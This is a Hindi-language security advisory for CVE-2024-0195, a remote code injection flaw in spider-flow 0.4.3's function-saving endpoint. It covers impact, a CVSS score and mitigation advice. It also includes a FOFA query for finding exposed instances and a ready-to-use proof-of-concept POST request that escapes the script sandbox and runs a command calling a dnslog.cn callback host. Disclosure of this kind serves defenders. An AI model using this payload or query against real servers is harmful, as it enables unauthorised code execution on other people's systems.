
CVE-2024-0195 कोड उत्पादन का अनुचित नियंत्रण ('कोड इंजेक्शन')
CVE-2024-0195 spider-flow 0.4.3 वेब एप्लिकेशन में एक महत्वपूर्ण कोड इंजेक्शन भेद्यता है, विशेष रूप से FunctionController.java फ़ाइल के FunctionService.saveFunction फ़ंक्शन में। कोई हमलावर दूरस्थ रूप से दुर्भावनापूर्ण कोड इंजेक्ट कर सकता है जो सर्वर पर निष्पादित होता है। इससे एप्लिकेशन पूरी तरह से समझौता हो जाता है।
यह भेद्यता अत्यंत गंभीर है क्योंकि यह संवेदनशील spider-flow एप्लिकेशन होस्ट करने वाले सर्वर पर दूरस्थ कोड निष्पादन की अनुमति देती है। हमलावर सर्वर से पूरी तरह समझौता कर सकता है, संवेदनशील डेटा चुरा सकता है, मैलवेयर या क्रिप्टो माइनर इंस्टॉल कर सकता है, और नेटवर्क के अंदर आगे के हमलों के लिए इसका उपयोग कर सकता है। एप्लिकेशन और सर्वर की गोपनीयता, अखंडता और उपलब्धता सभी गंभीर रूप से प्रभावित होती हैं।
पैच किए गए संस्करण का स्पष्ट रूप से उल्लेख नहीं किया गया है, इसलिए वर्तमान में पैचिंग एक विकल्प नहीं लगता है। भेद्यता सार्वजनिक रूप से प्रकट की गई थी और शोषण उपलब्ध हैं, इसलिए तत्काल शमन महत्वपूर्ण है।
जब तक कोई आधिकारिक पैच जारी नहीं किया जाता, spider-flow 0.4.3 को तुरंत ऑफ़लाइन ले लिया जाना चाहिए या केवल विश्वसनीय नेटवर्क/उपयोगकर्ताओं तक पहुंच प्रतिबंधित कर दी जानी चाहिए। वेब एप्लिकेशन फ़ायरवॉल या अन्य इनपुट सत्यापन नियंत्रण को कोड इंजेक्शन हमलों का पता लगाने और ब्लॉक करने के लिए एक अंतरिम शमन के रूप में कॉन्फ़िगर किया जा सकता है। हालाँकि, ये पूर्ण समाधान नहीं हैं और जैसे ही कोई फिक्स्ड रिलीज़ उपलब्ध हो, कमजोर संस्करण को अपग्रेड किया जाना चाहिए।
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ प्रूफ ऑफ कॉन्सेप्ट
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B